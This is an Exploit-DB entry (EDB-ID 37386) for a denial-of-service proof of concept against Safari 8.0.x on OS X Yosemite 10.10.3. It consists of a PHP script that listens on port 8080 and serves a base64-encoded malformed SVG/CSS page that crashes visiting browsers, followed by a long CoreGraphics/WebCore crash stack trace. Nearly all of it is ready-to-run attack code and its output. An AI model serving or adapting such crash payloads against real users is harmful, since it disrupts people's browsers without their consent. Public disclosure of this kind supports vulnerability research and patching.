Exploit Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)

[Exploiter]

EDB-ID

37386

Проверка EDB

1. Пройдено

Автор

MOHAMMAD REZA ESPARGHAM

Тип уязвимости

DOS

Платформа

OSX

CVE

N/A

Дата публикации

2015-06-26

Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)

#!/usr/bin/php
<?php
# Title          :  Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of 
Concept
# Product Website:  https://www.apple.com/safari/
# Author         :  Mohammad Reza Espargham
# Linkedin       :  https://ir.linkedin.com/in/rezasp
# E-Mail         :  me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website        :  www.reza.es
# Twitter        :  https://twitter.com/rezesp
# FaceBook       :  https://www.facebook.com/mohammadreza.espargham



# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)

#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create 
socket!');
socket_bind($reza, 0,8080);
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
$msg = 
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd=base64_decode($msg);
for (;;) {
         if ($client = @socket_accept($reza)) {
             socket_write($client, "HTTP/1.1 200 OK\r\n" .
             "Content-length: " . strlen($msgd) . "\r\n" .
             "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
             $msgd);
         }
         else usleep(100000);
}





#Crash Report
/*

Process Model:
Multiple Web Processes


Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib        	0x00007fff8e628286 __pthread_kill + 
10
1   libsystem_c.dylib             	0x00007fff90619b53 abort + 129
2   libsystem_c.dylib             	0x00007fff905e1c39 __assert_rtn + 321
3   com.apple.CoreGraphics        	0x00007fff87716e4e 
CGPathCreateMutableCopyByTransformingPath + 242
4   com.apple.CoreGraphics        	0x00007fff8773aff0 CGContextAddPath + 
93
5   com.apple.WebCore             	0x0000000104ea8c84 
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6   com.apple.WebCore             	0x000000010597e851 
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, 
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, 
WebCore::RenderSVGShape const*) + 65
7   com.apple.WebCore             	0x000000010597f08a 
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, 
WebCore::GraphicsContext*) + 122
8   com.apple.WebCore             	0x000000010597f3c3 
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9   com.apple.WebCore             	0x0000000104fa73cb 
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 379
10  com.apple.WebCore             	0x0000000104fa7062 
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 1330
11  com.apple.WebCore             	0x0000000104f1ee72 
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 722
12  com.apple.WebCore             	0x0000000105429e88 
WebCore::InlineElementBox::paint(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 
312
13  com.apple.WebCore             	0x0000000104ea4a63 
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14  com.apple.WebCore             	0x0000000104ea4509 
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15  com.apple.WebCore             	0x0000000104e53d96 
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, 
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16  com.apple.WebCore             	0x0000000104e51373 
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 67
17  com.apple.WebCore             	0x0000000104e50724 
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 420
18  com.apple.WebCore             	0x0000000104e529af 
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 287
19  com.apple.WebCore             	0x00000001058db139 
WebCore::RenderBlock::paintChild(WebCore::RenderBox&, 
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, 
bool) + 393
20  com.apple.WebCore             	0x0000000104e51478 
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21  com.apple.WebCore             	0x0000000104e51420 
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 240
22  com.apple.WebCore             	0x0000000104e50724 
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 420
23  com.apple.WebCore             	0x0000000104e529af 
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 287
24  com.apple.WebCore             	0x0000000104e512b2 
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, 
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, 
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo 
const&, unsigned int, WebCore::RenderObject*) + 370
25  com.apple.WebCore             	0x0000000104e50f87 
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, 
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, 
WebCore::RenderObject*, bool, bool) + 423
26  com.apple.WebCore             	0x0000000104e4fc30 
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27  com.apple.WebCore             	0x0000000104e4f002 
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28  com.apple.WebCore             	0x0000000104e4fd62 
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29  com.apple.WebCore             	0x0000000104e7ac36 
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer 
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned 
int, unsigned int) + 358
30  com.apple.WebCore             	0x000000010593757f 
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer 
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect 
const&) + 799
31  com.apple.WebCore             	0x000000010537dd44 
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, 
WebCore::FloatRect const&) + 132
32  com.apple.WebCore             	0x00000001058b6ad9 
WebCore::PlatformCALayer::drawLayerContents(CGContext*, 
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, 
WTF::CrashOnOverflow>&) + 361
33  com.apple.WebCore             	0x0000000105b170a7 
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, 
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34  com.apple.WebCore             	0x0000000105ba36cc -[WebSimpleLayer 
drawInContext:] + 172
35  com.apple.QuartzCore          	0x00007fff8d7033c7 
CABackingStoreUpdate_ + 3306
36  com.apple.QuartzCore          	0x00007fff8d7026d7 
___ZN2CA5Layer8display_Ev_block_invoke + 59
37  com.apple.QuartzCore          	0x00007fff8d702694 
x_blame_allocations + 81
38  com.apple.QuartzCore          	0x00007fff8d6f643c 
CA::Layer::display_() + 1546
39  com.apple.WebCore             	0x0000000105ba35eb -[WebSimpleLayer 
display] + 43
40  com.apple.QuartzCore          	0x00007fff8d6f47fd 
CA::Layer::display_if_needed(CA::Transaction*) + 603
41  com.apple.QuartzCore          	0x00007fff8d6f3e81 
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42  com.apple.QuartzCore          	0x00007fff8d6f3612 
CA::Context::commit_transaction(CA::Transaction*) + 242
43  com.apple.QuartzCore          	0x00007fff8d6f33ae 
CA::Transaction::commit() + 390
44  com.apple.QuartzCore          	0x00007fff8d701f19 
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, 
void*) + 71
45  com.apple.CoreFoundation      	0x00007fff869f7127 
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46  com.apple.CoreFoundation      	0x00007fff869f7080 
__CFRunLoopDoObservers + 368
47  com.apple.CoreFoundation      	0x00007fff869e8bf8 
CFRunLoopRunSpecific + 328
48  com.apple.HIToolbox           	0x00007fff8df1156f 
RunCurrentEventLoopInMode + 235
49  com.apple.HIToolbox           	0x00007fff8df112ea 
ReceiveNextEventCommon + 431
50  com.apple.HIToolbox           	0x00007fff8df1112b 
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51  com.apple.AppKit              	0x00007fff8ebe59bb _DPSNextEvent + 
978
52  com.apple.AppKit              	0x00007fff8ebe4f68 -[NSApplication 
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53  com.apple.AppKit              	0x00007fff8ebdabf3 -[NSApplication 
run] + 594
54  com.apple.AppKit              	0x00007fff8eb57354 NSApplicationMain 
+ 1832
55  libxpc.dylib                  	0x00007fff8ab77958 _xpc_objc_main + 
793
56  libxpc.dylib                  	0x00007fff8ab79060 xpc_main + 490
57  com.apple.WebKit.WebContent   	0x0000000103f10b40 0x103f10000 + 2880
58  libdyld.dylib                 	0x00007fff873e45c9 start + 1
*/
?>